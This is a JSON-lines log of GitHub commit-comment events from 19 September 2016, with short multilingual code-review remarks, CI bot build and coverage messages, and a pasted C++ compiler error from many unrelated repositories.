{"id":"4582877321","type":"CommitCommentEvent","actor":{"login":"Bammerbom"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19077522,"position":39,"line":62,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T12:04:16Z","updated_at":"2016-09-19T12:04:16Z","body":"incorrect return"}},"created_at":"2016-09-19T12:04:16Z"}
{"id":"4582878730","type":"CommitCommentEvent","actor":{"login":"Bammerbom"},"repo":{"name":"SpongePowered/SpongeAPI"},"payload":{"comment":{"id":19077524,"position":46,"line":69,"path":"src/main/java/org/spongepowered/api/item/inventory/entity/PlayerInventory.java","commit_id":"b88f5eba36f8f62892b10f17ea094d5bcb884ea1","created_at":"2016-09-19T12:04:23Z","updated_at":"2016-09-19T12:04:23Z","body":"incorrect return"}},"created_at":"2016-09-19T12:04:23Z"}
{"id":"4582885097","type":"CommitCommentEvent","actor":{"login":"edit-mode"},"repo":{"name":"chromee/soukai-app"},"payload":{"comment":{"id":19077535,"position":11,"line":25,"path":"app/controllers/projects_controller.rb","commit_id":"57245754c85d7c2089ae7d608183711612537ff0","created_at":"2016-09-19T12:05:59Z","updated_at":"2016-09-19T12:05:59Z","body":"eachの中で都度DBにアクセスされるので事前にHashにしておくなどしましょう。\r\nちなみにActiveRecordがDBにアクセスするタイミングは「値が必要になった時」で、この場合ではsizeを取得する際になるはずです。\r\nDBのアクセスのログはコンソールにも表示されてるはずなので、都度確認して、DBへのアクセス回数は最小限に留めるように常に意識してコードを書きましょう。\r\n基本的には1つのモデル（テーブル）に対しては1回のアクセスで済むはずです。"}},"created_at":"2016-09-19T12:05:59Z"}
{"id":"4582886691","type":"CommitCommentEvent","actor":{"login":"CurlyRhyme"},"repo":{"name":"nicelgbt/codl"},"payload":{"comment":{"id":19077537,"position":7,"line":6,"path":"index.html","commit_id":"b268a7dff8607c55e66cd0ed8114657df044ab42","created_at":"2016-09-19T12:06:24Z","updated_at":"2016-09-19T12:06:24Z","body":"thanks git"}},"created_at":"2016-09-19T12:06:24Z"}
{"id":"4582886847","type":"CommitCommentEvent","actor":{"login":"ZhangZhicheng1900"},"repo":{"name":"contiv/ofnet"},"payload":{"comment":{"id":19077538,"position":29,"line":29,"path":"README.md","commit_id":"b0238a542a9b1d098eb3e855f634beb9477ecbaa","created_at":"2016-09-19T12:06:26Z","updated_at":"2016-09-19T12:06:26Z","body":"Where can I get the usage ?"}},"created_at":"2016-09-19T12:06:26Z"}
{"id":"4582890367","type":"CommitCommentEvent","actor":{"login":"MaximDanilov"},"repo":{"name":"MaximDanilov/GIIS"},"payload":{"comment":{"id":19077549,"position":null,"line":null,"path":null,"commit_id":"52c8d3acdea61524bc1682b05181269685e64343","created_at":"2016-09-19T12:07:18Z","updated_at":"2016-09-19T12:07:18Z","body":"Как-то сильносвязно получается. "}},"created_at":"2016-09-19T12:07:18Z"}
{"id":"4582891643","type":"CommitCommentEvent","actor":{"login":"cookiegg"},"repo":{"name":"allenyangyl/dehaze"},"payload":{"comment":{"id":19077552,"position":null,"line":null,"path":null,"commit_id":"0015ae4acb2af85d08e7f0c05134d357846f4aaf","created_at":"2016-09-19T12:07:36Z","updated_at":"2016-09-19T12:07:36Z","body":"thankyou"}},"created_at":"2016-09-19T12:07:36Z"}
{"id":"4582891729","type":"CommitCommentEvent","actor":{"login":"JavaProgrammerLB"},"repo":{"name":"JavaProgrammerLB/SpringStepByStep"},"payload":{"comment":{"id":19077553,"position":25,"line":25,"path":"java-mail-demo/src/main/java/com/yitianyigexiangfa/mail/JavaMailDemo.java","commit_id":"1d3a309a5249b9c2f3722a790f998223a1b463fd","created_at":"2016-09-19T12:07:37Z","updated_at":"2016-09-19T12:07:37Z","body":"SimpleEmail对象"}},"created_at":"2016-09-19T12:07:37Z"}
{"id":"4582893309","type":"CommitCommentEvent","actor":{"login":"eronisko"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19077556,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-19T12:07:59Z","updated_at":"2016-09-19T12:07:59Z","body":"> It is a breaking change if you were using `ActivityEventListener` directly, instead of `BaseActivityEventListener`. \r\n\r\nI'm guessing lots of people would have been using `ActivityEventListener` because even the [0.34 docs](http://facebook.github.io/react-native/releases/0.34/docs/native-modules-android.html#getting-activity-result-from-startactivityforresult) describe it as the way to add native modules. There is no mention of the `BaseActivityEventListener` class anywhere in the docs."}},"created_at":"2016-09-19T12:07:59Z"}
{"id":"4582893629","type":"CommitCommentEvent","actor":{"login":"dannycabrera"},"repo":{"name":"dannycabrera/Get-iOS-Model"},"payload":{"comment":{"id":19077559,"position":null,"line":null,"path":null,"commit_id":"bb705ddc67e9e4036d46cd495d6849612e6beed8","created_at":"2016-09-19T12:08:06Z","updated_at":"2016-09-19T12:08:06Z","body":"Thank you for the change."}},"created_at":"2016-09-19T12:08:06Z"}
{"id":"4582893818","type":"CommitCommentEvent","actor":{"login":"cookiegg"},"repo":{"name":"allenyangyl/dehaze"},"payload":{"comment":{"id":19077560,"position":null,"line":null,"path":null,"commit_id":"0015ae4acb2af85d08e7f0c05134d357846f4aaf","created_at":"2016-09-19T12:08:09Z","updated_at":"2016-09-19T12:08:09Z","body":"It is great healpful"}},"created_at":"2016-09-19T12:08:09Z"}
{"id":"4582898284","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/serokell-core"},"payload":{"comment":{"id":19077583,"position":15,"line":68,"path":"src/Serokell/Util/Common.hs","commit_id":"dd145591941986d7f3bfe4e6fd942debc00b1f74","created_at":"2016-09-19T12:09:15Z","updated_at":"2016-09-19T12:09:15Z","body":"Ok, I just needed to do it ASAP because I was in hurry."}},"created_at":"2016-09-19T12:09:15Z"}
{"id":"4582899164","type":"CommitCommentEvent","actor":{"login":"poltow"},"repo":{"name":"hdavid/Launchpad95"},"payload":{"comment":{"id":19077586,"position":32,"line":1054,"path":"StepSequencerComponent.py","commit_id":"6c48c371f1f0a9236d99db8a0bef06732fdc5ad9","created_at":"2016-09-19T12:09:27Z","updated_at":"2016-09-19T12:09:27Z","body":"This is inside of this conditional: if self.is_enabled() and self._clip != None: so this part of the code only will be reachable when the StepSequencer is enabled, that's what you meant?\r\n"}},"created_at":"2016-09-19T12:09:27Z"}
{"id":"4582900135","type":"CommitCommentEvent","actor":{"login":"kodemi"},"repo":{"name":"react-toolbox/react-toolbox"},"payload":{"comment":{"id":19077587,"position":6,"line":115,"path":"components/utils/time.js","commit_id":"b8d59f7b4cfdc373f796df8da5173718fd9f11ef","created_at":"2016-09-19T12:09:41Z","updated_at":"2016-09-19T12:09:41Z","body":"Typo in \"Июльу\". Right to be \"Июль\". "}},"created_at":"2016-09-19T12:09:41Z"}
{"id":"4582903040","type":"CommitCommentEvent","actor":{"login":"arnaud-morvan"},"repo":{"name":"arnaud-morvan/QGIS"},"payload":{"comment":{"id":19077592,"position":44,"line":401,"path":"python/plugins/processing/gui/wrappers.py","commit_id":"6ac0a80bd9f8517003cb35f1cb4a7fda2ca91095","created_at":"2016-09-19T12:10:23Z","updated_at":"2016-09-19T12:10:23Z","body":"It meens I forgot something, tested only with ParameterVector.\r\nShould be widget.valueChanged.connect(lambda: self.widgetValueHasChanged.emit(self))\r\nI add it to my todos with the rebase."}},"created_at":"2016-09-19T12:10:23Z"}
{"id":"4582903904","type":"CommitCommentEvent","actor":{"login":"hanadikmail"},"repo":{"name":"hanadikmail/hey-"},"payload":{"comment":{"id":19077595,"position":null,"line":null,"path":null,"commit_id":"7af861c18e6969f5d168977f490cef258c5bd742","created_at":"2016-09-19T12:10:36Z","updated_at":"2016-09-19T12:10:36Z","body":"my name is hanadi"}},"created_at":"2016-09-19T12:10:36Z"}
{"id":"4582905943","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19077602,"position":null,"line":null,"path":null,"commit_id":"b027d85a169028261ca106fafae10bea0fd96fe9","created_at":"2016-09-19T12:11:08Z","updated_at":"2016-09-19T12:11:08Z","body":"good :+1: "}},"created_at":"2016-09-19T12:11:08Z"}
{"id":"4582906139","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19077604,"position":5,"line":45,"path":"addons/mrp/models/stock_scrap.py","commit_id":"4a9612b86c66e6364fcaa4adb272a1193896bc35","created_at":"2016-09-19T12:11:11Z","updated_at":"2016-09-19T12:11:11Z","body":"vals['origin'] = vals.get('origin', self.production_id.name or '') maybe?\r\n\r\nor '' seems louche"}},"created_at":"2016-09-19T12:11:11Z"}
{"id":"4582906704","type":"CommitCommentEvent","actor":{"login":"klugj"},"repo":{"name":"SeminarKolbe/QuizApp"},"payload":{"comment":{"id":19077606,"position":35,"line":35,"path":"QuizApp-master/src/java/de/projekt/model/DatenbankZugang.java","commit_id":"b472193c1eb742397bbb1363d801e99648d6e612","created_at":"2016-09-19T12:11:19Z","updated_at":"2016-09-19T12:11:19Z","body":"lllll"}},"created_at":"2016-09-19T12:11:19Z"}
{"id":"4582907414","type":"CommitCommentEvent","actor":{"login":"LWTechGaming"},"repo":{"name":"TheSharks/WildBeast"},"payload":{"comment":{"id":19077608,"position":null,"line":null,"path":null,"commit_id":"cdc9816f8cbc2e0ee57924298bc2da9c341b4cb3","created_at":"2016-09-19T12:11:29Z","updated_at":"2016-09-19T12:11:29Z","body":"Repo migration to an organization breaks a lot of things, doesn't it? 👀 "}},"created_at":"2016-09-19T12:11:29Z"}
{"id":"4582907624","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19077609,"position":null,"line":null,"path":null,"commit_id":"6c73270686137b59f3575840f6040108aacdf490","created_at":"2016-09-19T12:11:32Z","updated_at":"2016-09-19T12:11:32Z","body":"I can switch back to the arrow sprite, but it's blue. Anyway, as I said, the shift is because the image is pixelated and has dithered edges."}},"created_at":"2016-09-19T12:11:32Z"}
{"id":"4582907735","type":"CommitCommentEvent","actor":{"login":"ffont"},"repo":{"name":"MTG/freesound"},"payload":{"comment":{"id":19077610,"position":null,"line":null,"path":null,"commit_id":"0fa36f20c80b2128b88715020136babd15e4055d","created_at":"2016-09-19T12:11:33Z","updated_at":"2016-09-19T12:11:33Z","body":"I think it would still be good to be able to compare both ways in terms of performance (specially for packs with large number of sounds).\r\nAny ideas on how to measure that?"}},"created_at":"2016-09-19T12:11:33Z"}
{"id":"4582908827","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19077611,"position":null,"line":null,"path":null,"commit_id":"a01367d24d875e7c00ee42068d63c903f54da9e0","created_at":"2016-09-19T12:11:48Z","updated_at":"2016-09-19T12:11:48Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#RmPqz-k6TJ6eEavo8667Gg"}},"created_at":"2016-09-19T12:11:48Z"}
{"id":"4582909613","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077614,"position":24,"line":36,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionClassifier-sparkcompute.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:11:59Z","updated_at":"2016-09-19T12:11:59Z","body":"Can we change the statement to :  \r\nThis example uses the fields ``text`` and ``imp`` from the input record for classification and sets the prediction on to the ``isSpam`` field."}},"created_at":"2016-09-19T12:11:59Z"}
{"id":"4582912302","type":"CommitCommentEvent","actor":{"login":"KairusDarkSeeker"},"repo":{"name":"PocketEssential/DailyRewards"},"payload":{"comment":{"id":19077622,"position":null,"line":null,"path":null,"commit_id":"153f91a067b46045c1d8a30aaa848a35747571da","created_at":"2016-09-19T12:12:38Z","updated_at":"2016-09-19T12:12:38Z","body":"nice one dude, I was planning on making this but I'm too busy at school"}},"created_at":"2016-09-19T12:12:38Z"}
{"id":"4582912827","type":"CommitCommentEvent","actor":{"login":"Bloke"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19077625,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-19T12:12:46Z","updated_at":"2016-09-19T12:12:46Z","body":"@bloatware Yes. I think for 4.7 we should make the Diagnostics panel the default location after upgrade and add a link to the Languages panel in the pre-flight check if there are any strings that need updating.\r\n\r\nAs alluded in the commit message above, I would also like to add a new `FlashMessage()` class. This is a session-based class into which you can `->add()` messages from anywhere in the UI/plugins as you're doing stuff. Then, on next page load the `announce()` call of the theme asks the FlashMessage class for any entries and renders them. The act of requesting the messages deletes them from the session so they don't show again.\r\n\r\nWith this in place we can move towards a system where we don't pass `$msg` strings around, but we add them directly to the flash message class. Then the next call to _any_ panel will display whatever is in the class and clear the messages. Better for plugins that hook into `pluggable_ui()`, since messages they might generate don't get lost or overwritten by core events. As we gradually refactor the panels to remove the silly enforced call to the 'list' step after each action (so the steps then become atomic) this'll really benefit plugin authors who can reuse more core code.\r\n\r\nThis also opens up the ability to add info to the FlashMessage area about upgrade problems. And if everything went well, the message could be something like: \"That went well. Welcome to Textpattern x.y.z\", which is a lot nicer than wondering if everything worked.\r\n\r\nI've got a FlashMessage class I've written for another project that I'll roll into 4.7 soon."}},"created_at":"2016-09-19T12:12:46Z"}
{"id":"4582912867","type":"CommitCommentEvent","actor":{"login":"Chaosvex"},"repo":{"name":"EmberEmu/Ember"},"payload":{"comment":{"id":19077626,"position":13,"line":112,"path":"src/login/main.cpp","commit_id":"1ccb801b5c304cc5a65f2508c7b3e12f8d46e07c","created_at":"2016-09-19T12:12:47Z","updated_at":"2016-09-19T12:12:47Z","body":"The integrity checks only include some of the binaries, not the actual game data. Warden is a better tool for detecting cheats. \r\n\r\nThe survey is for gathering hardware data and the patcher is for, well, patching out of date clients."}},"created_at":"2016-09-19T12:12:47Z"}
{"id":"4582914986","type":"CommitCommentEvent","actor":{"login":"edit-mode"},"repo":{"name":"chromee/soukai-app"},"payload":{"comment":{"id":19077629,"position":98,"line":69,"path":"app/controllers/votes_controller.rb","commit_id":"57245754c85d7c2089ae7d608183711612537ff0","created_at":"2016-09-19T12:13:16Z","updated_at":"2016-09-19T12:13:16Z","body":"set_projectsにしましょう。\r\nメソッド名・変数名は常に内容を忠実に示す物を付ける事を意識しましょう。"}},"created_at":"2016-09-19T12:13:16Z"}
{"id":"4582916367","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077634,"position":2,"line":9,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionTrainer-sparksink.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:13:33Z","updated_at":"2016-09-19T12:13:33Z","body":"For general cases we have specified the name without any spaces. Not sure if \"# Logistic Regression Trainer\" is accepted"}},"created_at":"2016-09-19T12:13:33Z"}
{"id":"4582918332","type":"CommitCommentEvent","actor":{"login":"ekondrashev"},"repo":{"name":"ekondrashev/quiz"},"payload":{"comment":{"id":19077639,"position":24,"line":24,"path":"src/EntireDocument.java","commit_id":"ad4b1acb20fe4591a5e1c68c4d9bc0ac5dd16d40","created_at":"2016-09-19T12:14:00Z","updated_at":"2016-09-19T12:14:00Z","body":"Please make use of one but"}},"created_at":"2016-09-19T12:14:00Z"}
{"id":"4582918582","type":"CommitCommentEvent","actor":{"login":"ekondrashev"},"repo":{"name":"ekondrashev/quiz"},"payload":{"comment":{"id":19077641,"position":19,"line":19,"path":"src/EntireDocument.java","commit_id":"ad4b1acb20fe4591a5e1c68c4d9bc0ac5dd16d40","created_at":"2016-09-19T12:14:05Z","updated_at":"2016-09-19T12:14:05Z","body":"https://docs.oracle.com/javase/7/docs/api/java/lang/StringBuilder.html#StringBuilder()\r\n"}},"created_at":"2016-09-19T12:14:05Z"}
{"id":"4582920093","type":"CommitCommentEvent","actor":{"login":"ekondrashev"},"repo":{"name":"ekondrashev/quiz"},"payload":{"comment":{"id":19077643,"position":39,"line":39,"path":"src/EntireDocument.java","commit_id":"ad4b1acb20fe4591a5e1c68c4d9bc0ac5dd16d40","created_at":"2016-09-19T12:14:25Z","updated_at":"2016-09-19T12:14:25Z","body":"but"}},"created_at":"2016-09-19T12:14:25Z"}
{"id":"4582921469","type":"CommitCommentEvent","actor":{"login":"belousovpf"},"repo":{"name":"HimkiDevCom/templateproject"},"payload":{"comment":{"id":19077645,"position":9,"line":9,"path":"README.md","commit_id":"6a97d87789f278e2681eb4f49339e3af772618d4","created_at":"2016-09-19T12:14:45Z","updated_at":"2016-09-19T12:14:45Z","body":"#2  так ли делается форк? пока не пониманю, разбираюсь"}},"created_at":"2016-09-19T12:14:45Z"}
{"id":"4582921570","type":"CommitCommentEvent","actor":{"login":"lbarras"},"repo":{"name":"lbarras/hello-world"},"payload":{"comment":{"id":19077646,"position":2,"line":2,"path":"README.md","commit_id":"92a1d15cb36b166689e159a836a6094344568fe7","created_at":"2016-09-19T12:14:46Z","updated_at":"2016-09-19T12:14:46Z","body":"adding stuff"}},"created_at":"2016-09-19T12:14:46Z"}
{"id":"4582922291","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19077648,"position":32,"line":32,"path":"material/db_table.md","commit_id":"3295b3438ff47a3496ff57f4e8058394a0402c86","created_at":"2016-09-19T12:14:55Z","updated_at":"2016-09-19T12:14:55Z","body":"Lass mal'n paar E-Mail Adresse in Klartext ins Internet packen ;-)"}},"created_at":"2016-09-19T12:14:55Z"}
{"id":"4582922613","type":"CommitCommentEvent","actor":{"login":"PSheon"},"repo":{"name":"PSheon/hello"},"payload":{"comment":{"id":19077649,"position":null,"line":null,"path":null,"commit_id":"da12ccce1705959d9d7b4550e18fab32e64490f2","created_at":"2016-09-19T12:15:00Z","updated_at":"2016-09-19T12:15:00Z","body":"nice body"}},"created_at":"2016-09-19T12:15:00Z"}
{"id":"4582922742","type":"CommitCommentEvent","actor":{"login":"lbarras"},"repo":{"name":"lbarras/hello-world"},"payload":{"comment":{"id":19077650,"position":null,"line":null,"path":null,"commit_id":"92a1d15cb36b166689e159a836a6094344568fe7","created_at":"2016-09-19T12:15:03Z","updated_at":"2016-09-19T12:15:03Z","body":"tests"}},"created_at":"2016-09-19T12:15:03Z"}
{"id":"4582922969","type":"CommitCommentEvent","actor":{"login":"ananya-bhattacharya"},"repo":{"name":"ameyk/CASK-PSL"},"payload":{"comment":{"id":19077651,"position":2,"line":9,"path":"hydrator-plugins/spark-plugins/docs/LogisticRegressionTrainer-sparksink.md","commit_id":"5895217f0c937d2b4cbb62eaa977a85837c7cd7a","created_at":"2016-09-19T12:15:07Z","updated_at":"2016-09-19T12:15:07Z","body":"Can we change the description to : \r\nTrains a classification model based upon a particular label and features of a record. Saves this model to a FileSet."}},"created_at":"2016-09-19T12:15:07Z"}
{"id":"4582923120","type":"CommitCommentEvent","actor":{"login":"CentForceOpt"},"repo":{"name":"CentForceOpt/PiFractions"},"payload":{"comment":{"id":19077653,"position":8,"line":6,"path":"README.md","commit_id":"4bbd00fa918fa1a3503c1dcc022eca19c4a0edd3","created_at":"2016-09-19T12:15:10Z","updated_at":"2016-09-19T12:15:10Z","body":"File BBP_Pi_160K.DAT contains the first 215,830 Pi Fractions that are required by the source listings."}},"created_at":"2016-09-19T12:15:10Z"}
{"id":"4582923790","type":"CommitCommentEvent","actor":{"login":"hanadikmail"},"repo":{"name":"hanadikmail/hey-"},"payload":{"comment":{"id":19077654,"position":null,"line":null,"path":null,"commit_id":"7af861c18e6969f5d168977f490cef258c5bd742","created_at":"2016-09-19T12:15:19Z","updated_at":"2016-09-19T12:15:19Z","body":"akakd"}},"created_at":"2016-09-19T12:15:19Z"}
{"id":"4582925166","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19077656,"position":null,"line":null,"path":null,"commit_id":"02fdfe77189d73507709f29738b78655f22671bf","created_at":"2016-09-19T12:15:38Z","updated_at":"2016-09-19T12:15:38Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1046](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13542&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T12:15:38Z"}
{"id":"4582925815","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":19077657,"position":null,"line":null,"path":null,"commit_id":"4a9612b86c66e6364fcaa4adb272a1193896bc35","created_at":"2016-09-19T12:15:49Z","updated_at":"2016-09-19T12:15:49Z","body":"[IMP] stock, mrp: origin of scrap\r\n\r\nIf the user has not filled the origin of the scrap, we set it to its associated picking or production order ( if any)."}},"created_at":"2016-09-19T12:15:49Z"}
{"id":"4582928450","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19077661,"position":null,"line":null,"path":null,"commit_id":"3295b3438ff47a3496ff57f4e8058394a0402c86","created_at":"2016-09-19T12:16:25Z","updated_at":"2016-09-19T12:16:25Z","body":"Wird bei Python Projekten nicht rst über md bevorzugt?"}},"created_at":"2016-09-19T12:16:25Z"}
{"id":"4582929394","type":"CommitCommentEvent","actor":{"login":"albertoleal"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":19077664,"position":168,"line":167,"path":"image_puller/unpacker/namespaced_cmd_linux.go","commit_id":"b0230f714fc1ceb347ea4c688cd647e7a79965bf","created_at":"2016-09-19T12:16:38Z","updated_at":"2016-09-19T12:16:38Z","body":"I wonder if it's a good idea to use `chug.Chug`(https://github.com/cloudfoundry/lager/blob/master/chug/chug.go#L36) to parse the entries. WDYT?"}},"created_at":"2016-09-19T12:16:38Z"}
{"id":"4582930790","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19077670,"position":null,"line":null,"path":null,"commit_id":"b724e2cd0087adca18edf2746078fd13a4f97f1e","created_at":"2016-09-19T12:16:58Z","updated_at":"2016-09-19T12:16:58Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-MacOS-10.9-clang: OK (2332 of 2332 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T12:16:58Z"}
{"id":"4582938645","type":"CommitCommentEvent","actor":{"login":"Garduna1976"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19077685,"position":null,"line":null,"path":null,"commit_id":"77a381e127b5cf45ccf074947cfc1f644bcb2dc2","created_at":"2016-09-19T12:18:43Z","updated_at":"2016-09-19T12:18:43Z","body":"All updated. And Nederlands is the Dutch word for Dutch indeed.\n\n2016-09-19 13:06 GMT+02:00 rascarlo <notifications@github.com>:\n\n> @marci4 <https://github.com/marci4> @Garduna1976\n> <https://github.com/Garduna1976> please check added resources to be\n> translated.\n> settings_strings: line 24, lines 82 to 87.\n> Thanks again.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TilesLocalization/resources/commit/77a381e127b5cf45ccf074947cfc1f644bcb2dc2#commitcomment-19076910>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVOo12ptYO7RJn1oV1imb-XYwr_hFMtJks5qrmypgaJpZM4KAXWW>\n> .\n>\n"}},"created_at":"2016-09-19T12:18:43Z"}
{"id":"4582938680","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":19077686,"position":4,"line":21,"path":"common.cc","commit_id":"8b15bbcbc8ce551435a450068584655469341b76","created_at":"2016-09-19T12:18:44Z","updated_at":"2016-09-19T12:18:44Z","body":"IIRC there is a convention to name categories as a simple namespaced dot-separated string, so this category is expected to be ```qxmpp.stanza```."}},"created_at":"2016-09-19T12:18:44Z"}
{"id":"4582939897","type":"CommitCommentEvent","actor":{"login":"massich"},"repo":{"name":"massich/exercism-xcpp"},"payload":{"comment":{"id":19077688,"position":null,"line":null,"path":null,"commit_id":"4fac391d989a1d2aee1de9c037d0138de2be4190","created_at":"2016-09-19T12:19:00Z","updated_at":"2016-09-19T12:19:00Z","body":"I don't understand why the prototype does not match. \r\n\r\n```\r\nstd::map<std::string, int> word_count::words(const std::basic_string<char> &s)\r\n```\r\n```\r\n\r\n```\r\n```\r\n/home/sik/exercism/cpp/word-count/word_count.cpp:7:78: error: ‘std::map<std::basic_string<char>, int> word_count::words(const std::basic_string<char>&)’ should have been declared inside ‘word_count’\r\n std::map<std::string, int> word_count::words(const std::basic_string<char> &s)\r\n                                                                              ^\r\n/home/sik/exercism/cpp/word-count/word_count.cpp: In function ‘std::map<std::basic_string<char>, int> word_count::words(const std::basic_string<char>&)’:\r\n/home/sik/exercism/cpp/word-count/word_count.cpp:7:78: error: ambiguating new declaration of ‘std::map<std::basic_string<char>, int> word_count::words(const std::basic_string<char>&)’\r\nIn file included from /home/sik/exercism/cpp/word-count/word_count.cpp:4:0:\r\n/home/sik/exercism/cpp/word-count/word_count.h:6:36: note: old declaration ‘const std::map<std::basic_string<char>, int> word_count::words(const std::basic_string<char>&)’\r\n   const std::map<std::string, int> words(const std::basic_string<char> &s);\r\n                                    ^\r\n/home/sik/exercism/cpp/word-count/word_count.cpp:13:15: error: no match for ‘operator>>’ (operand types are ‘const istringstream {aka const std::basic_istringstream<char>}’ and ‘std::string {aka std::basic_string<char>}’)\r\n   while ( iss >> crr_word )\r\n               ^\r\n\r\n`````"}},"created_at":"2016-09-19T12:19:00Z"}
{"id":"4582944505","type":"CommitCommentEvent","actor":{"login":"PlusMinus0"},"repo":{"name":"mansenfranzen/ultimate"},"payload":{"comment":{"id":19077695,"position":38,"line":38,"path":"material/db_table.md","commit_id":"3295b3438ff47a3496ff57f4e8058394a0402c86","created_at":"2016-09-19T12:20:02Z","updated_at":"2016-09-19T12:20:02Z","body":"Kann man das auth modul erweitern? Wenn nicht ist prinzipiell gar nicht so verkehrt eine Benutzerdatenbank zu haben. Vielleicht sollte die lieber Profile als Account heißen und dann als Primärschlüssel direkt nen Fremdschlüssel zu Django auth haben."}},"created_at":"2016-09-19T12:20:02Z"}
{"id":"4582947807","type":"CommitCommentEvent","actor":{"login":"aske"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19077706,"position":null,"line":null,"path":null,"commit_id":"61859b9d598784f848aebc81283bd059ba26ee7e","created_at":"2016-09-19T12:20:46Z","updated_at":"2016-09-19T12:20:46Z","body":"This breaks eval for `futures_2_2`.\r\nAlso why make it `null`, should't be `disabled` enough? (I'm not really familiar with `disabled`, so just curious)"}},"created_at":"2016-09-19T12:20:46Z"}
{"id":"4582947834","type":"CommitCommentEvent","actor":{"login":"kasparsklavins"},"repo":{"name":"Quill88/bigint"},"payload":{"comment":{"id":19077707,"position":null,"line":null,"path":null,"commit_id":"5e8e18d62bc4ffb0c18476d126cdba73971a2c60","created_at":"2016-09-19T12:20:46Z","updated_at":"2016-09-19T12:20:46Z","body":"Okay, good to know."}},"created_at":"2016-09-19T12:20:46Z"}
{"id":"4582948106","type":"CommitCommentEvent","actor":{"login":"strelnikoff"},"repo":{"name":"strelnikoff/1_typo"},"payload":{"comment":{"id":19077708,"position":null,"line":null,"path":null,"commit_id":"e41e5af28b4edb53185130be46651cf7b8279bfb","created_at":"2016-09-19T12:20:50Z","updated_at":"2016-09-19T12:20:50Z","body":"Исправлена глупая опячатка "}},"created_at":"2016-09-19T12:20:50Z"}
{"id":"4582948464","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19077711,"position":null,"line":null,"path":null,"commit_id":"467a843dc8cb70a7290a9b62210466af05f110e5","created_at":"2016-09-19T12:20:55Z","updated_at":"2016-09-19T12:20:55Z","body":"[Code coverage](https://116-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.63%**"}},"created_at":"2016-09-19T12:20:55Z"}
{"id":"4582949154","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19077713,"position":null,"line":null,"path":null,"commit_id":"d37b495e8b798cbf7cf787a05eed4abddc0864b4","created_at":"2016-09-19T12:21:06Z","updated_at":"2016-09-19T12:21:06Z","body":"[Code coverage](https://117-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-19T12:21:06Z"}
